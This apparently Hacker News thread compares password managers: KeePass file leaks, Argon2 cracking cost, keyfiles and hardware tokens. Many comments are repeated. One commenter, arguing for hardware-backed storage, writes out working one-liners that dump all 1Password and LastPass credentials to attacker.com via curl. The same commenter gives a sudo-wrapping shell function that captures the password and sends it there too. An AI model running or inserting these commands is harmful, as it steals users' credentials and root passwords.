You also can add a local secret file just for extra safety. I also love that I can store Git and SSH authentication and do auto-type outside the browser as well
+1 KeePass + dropbox/gdrive/ "getting an FTP account, mounting it locally with curlftpfs, and then using SVN or CVS on the mounted filesystem."
> Keepass just stores everything in one encrypted .kdbx file
I've always wondered if this might be a potential vulnerability. If a file leaks some day and attacker gains an access to the file, he has infinite time to try to break a password and you cannot do anything about it. Using online password storage in theory could limit amount of login trials. Also, changing password in kdbx file has no effect as attacker still have physical access to previous file with previous password.
I've always wondered if this might be a potential vulnerability. If a file leaks some day and attacker gains an access to the file, he has infinite time to try to break a password and you cannot do anything about it. Using online password storage in theory could limit amount of login trials. Also, changing password in kdbx file has no effect as attacker still have physical access to previous file with previous password.
> If a file leaks some day and attacker gains an access to the file, he has infinite time to try to break a password and you cannot do anything about it.
Yes, good point. However, in the database security settings, you can set a decryption time between 100ms and 5s. I've set mine at 5s; I don't mind waiting 5 seconds for it to open, yet it will greatly hinder an opponent's efficiency.
There's also an optional key file. It can be anything as long as it doesn't change. The attacker has to get it, too, or he's in for a serious ride.
Yes, good point. However, in the database security settings, you can set a decryption time between 100ms and 5s. I've set mine at 5s; I don't mind waiting 5 seconds for it to open, yet it will greatly hinder an opponent's efficiency.
There's also an optional key file. It can be anything as long as it doesn't change. The attacker has to get it, too, or he's in for a serious ride.
Thanks for tips, I didn't know about it. I need to try it out
The nice thing with password managers is you only have to remember the one password. That means it's easy to make that password very strong. And then it just comes down to your key derivation.
https://keepass.info/help/base/security.html#secdictprotect
The documentation here is pretty unclear. I'm not a keypass user and I don't see what the default settings are. The recommendation though is "1 second" with Argon2 though, which seems like a good default.
I did a quick search, https://research.redhat.com/blog/article/how-expensive-is-it...
> cracking an eight-character passphrase [..] encrypted with Argon2 created on a modern laptop would require up to 75,121 powerful machines running for ten years and cost over 4 billion dollars.
So 8 characters with settings leading to ~2 seconds on a laptop (twice the recommendation from keepass) will cost 4 billion. So we can say 2 billion for 1 second (obviously we're hand waving a lot).
And that would still take 10 years.
So basically, if you have a government adversary who really fucking hates you and has a lot of time and money to kill just bruteforcing your volume, go ahead and add a few more characters and consider bumping up the setting to 5 seconds instead of 1. I think every character you add should (hand waving, data dependent) increase the search space by 10x.
https://keepass.info/help/base/security.html#secdictprotect
The documentation here is pretty unclear. I'm not a keypass user and I don't see what the default settings are. The recommendation though is "1 second" with Argon2 though, which seems like a good default.
I did a quick search, https://research.redhat.com/blog/article/how-expensive-is-it...
> cracking an eight-character passphrase [..] encrypted with Argon2 created on a modern laptop would require up to 75,121 powerful machines running for ten years and cost over 4 billion dollars.
So 8 characters with settings leading to ~2 seconds on a laptop (twice the recommendation from keepass) will cost 4 billion. So we can say 2 billion for 1 second (obviously we're hand waving a lot).
And that would still take 10 years.
So basically, if you have a government adversary who really fucking hates you and has a lot of time and money to kill just bruteforcing your volume, go ahead and add a few more characters and consider bumping up the setting to 5 seconds instead of 1. I think every character you add should (hand waving, data dependent) increase the search space by 10x.
> The nice thing with password managers is you only have to remember the one password. That means it's easy to make that password very strong.
And the BAD thing about password managers is that you need to type that password every time you want to access your database. Of course you can set some strong, complicated password, but you need to remember it and you need to type it sh*tload of times :) But I see your point
And the BAD thing about password managers is that you need to type that password every time you want to access your database. Of course you can set some strong, complicated password, but you need to remember it and you need to type it sh*tload of times :) But I see your point
Not true. You can have forgone a password. You can have a keyfile and put it on a USB stick. Use a hardware token (I use a Yubikey) or a combination, say keyfile + a short PIN.
If they access you device your side may be compromised (and a keylogger or cache inspector may defeat most password managers, offline or not).
And even if they get it because your online backup of it is leaky, it is encrypted using AES256 with a passphrase of whatever length you want to use, correct horse battery staple let you to generate complex enough and long, but memorable, passphrases. If your passwords are important enough to try to dedicate a lot of computer resources to break it, you can put a passphrase that can stand brute force attacks for centuries.
And even if they get it because your online backup of it is leaky, it is encrypted using AES256 with a passphrase of whatever length you want to use, correct horse battery staple let you to generate complex enough and long, but memorable, passphrases. If your passwords are important enough to try to dedicate a lot of computer resources to break it, you can put a passphrase that can stand brute force attacks for centuries.
You seem to be ignoring the possibility that the server behind the online storage is hacked and some files downloaded for offline cracking.
When it comes down to it, everything is in a file somewhere.
When it comes down to it, everything is in a file somewhere.
Just use Google's password manager. Especially if you use Android and Chrome.
So convenient and Google is trustworthy to that extent.
So convenient and Google is trustworthy to that extent.
It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked.
Here are some trivial examples of how malware can steal credentials in bulk.
Example: Exfiltrate all plaintext credentials from 1password
``` op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
Example: Exfiltrate all plaintext credentials from lastpass
``` lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.
Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particularly not for high risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).
I would strongly encourage for most use cases to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.
These offer damage control even when your endpoint is compromised.
Here are some trivial examples of how malware can steal credentials in bulk.
Example: Exfiltrate all plaintext credentials from 1password
``` op list items | jq -r '.[].uuid' | xargs -n1 bash -c 'op get item "$1"' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
Example: Exfiltrate all plaintext credentials from lastpass
``` lpass ls | grep -oP '(?<=id: )([0-9]+)' | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ```
I have seen fake password manager browser plugins deployed in the wild that phish and exfiltrate master passwords, though the above methods are even simpler as they could just run a loop waiting until a password manager is eventually unlocked.
Software-only password managers may be useful for casual personal use cases such as food delivery services or social media accounts, but are not recommended for any use cases that protect any significant value like production corporate systems, and in particularly not for high risk secrets such as cloud root account creds, TLS CAs, or crypto-asset keys (you know who you are).
I would strongly encourage for most use cases to consider secret management solutions that decrypt one credential at a time on external hardware such as Password Store backed with a Yubikey, Trezor password manager, or a Mooltipass.
These offer damage control even when your endpoint is compromised.
TIL 1Password has a command line tool named op.[1] It requires authenticating with your 1Password credentials and any granted authentication is said to time out after 30 minutes.
It looks useful and I'm thinking about downloading it, but if I did, I might not leave the binary as-named and I probably wouldn't locate it in /usr/local/bin, etc.
[1] https://support.1password.com/command-line-getting-started
It looks useful and I'm thinking about downloading it, but if I did, I might not leave the binary as-named and I probably wouldn't locate it in /usr/local/bin, etc.
[1] https://support.1password.com/command-line-getting-started
Obfuscation is not security. Besides, malware using this approach would just helpfully include the tools they need.
1. You have to install the 1Password CLI tool (and the LastPass tool?) separately, it is not part of the GUI application
2. It stays unlocked for some duration (I think it was configurable, can't remember), and does _not_ just give away credentials to anything that asks once that duration has passed
So yes, you can do what you claim, as long as you first install the CLI tool, and then tell it to stay unlocked for some time. Or you know, just don't do that.
So yes, you can do what you claim, as long as you first install the CLI tool, and then tell it to stay unlocked for some time. Or you know, just don't do that.
Someone that puts malware on your system presumably also can install a CLI tool.
They'd have to then unlock your vault too. I see I wasn't as clear as I could have been, but what I also meant was that the CLI doesn't automatically give access to _all the things_ just because it's installed either.
The CLI tool is just a simple example to help people understand how easy this is.
Real world malware will bring everything it needs with it to wait until your password manager database file is unlocked next, or simply keylog or otherwise intercept the master password. To prove this point once for a client I made a modified Lastpass chrome browser plugin that intercepts the master password on next use.
I could write examples for every password manager but instead consider how simply malware can override your sudo command to steal it the next time you use it. No pure software defenses will help against any decent malware.
```
function sudo () {
```
Real world malware will bring everything it needs with it to wait until your password manager database file is unlocked next, or simply keylog or otherwise intercept the master password. To prove this point once for a client I made a modified Lastpass chrome browser plugin that intercepts the master password on next use.
I could write examples for every password manager but instead consider how simply malware can override your sudo command to steal it the next time you use it. No pure software defenses will help against any decent malware.
```
function sudo () {
realsudo=$(which sudo)
read -r -s -p "[sudo] password for $USER: " password
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1
$realsudo "${@:1}"
}```
That's a very different proposition. It holds for your initial statement:
> It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked
and I agree that this is then true.
However, I would also consider that this is true for everthing, no matter the software you use. If malware gets on your machine, consider anything you can access via your machine compromised. I think this is fairly obvious to people here, and has no bearing in which password manager to use.
> It is non obvious but important to understand that most password managers, such as 1password, Lastpass, and almost everything else, expose all secrets to malware in plain text any time the password database is unlocked
and I agree that this is then true.
However, I would also consider that this is true for everthing, no matter the software you use. If malware gets on your machine, consider anything you can access via your machine compromised. I think this is fairly obvious to people here, and has no bearing in which password manager to use.
Very good point, it's pretty crazy that these systems don't seek authorization for each secret retrieved.
Do you have recommendations for software-only solutions that do this? ssh-agent has an option for it, not sure if anything else does (pass?)
Do you have recommendations for software-only solutions that do this? ssh-agent has an option for it, not sure if anything else does (pass?)
There can be no pure software solution to this.
If your OS is compromised you are hosed without dedicated and trusted external hardware as a gatekeeper.
If your OS is compromised you are hosed without dedicated and trusted external hardware as a gatekeeper.
Are there any good alternatives? Or do I have to use Kaspersy's password store?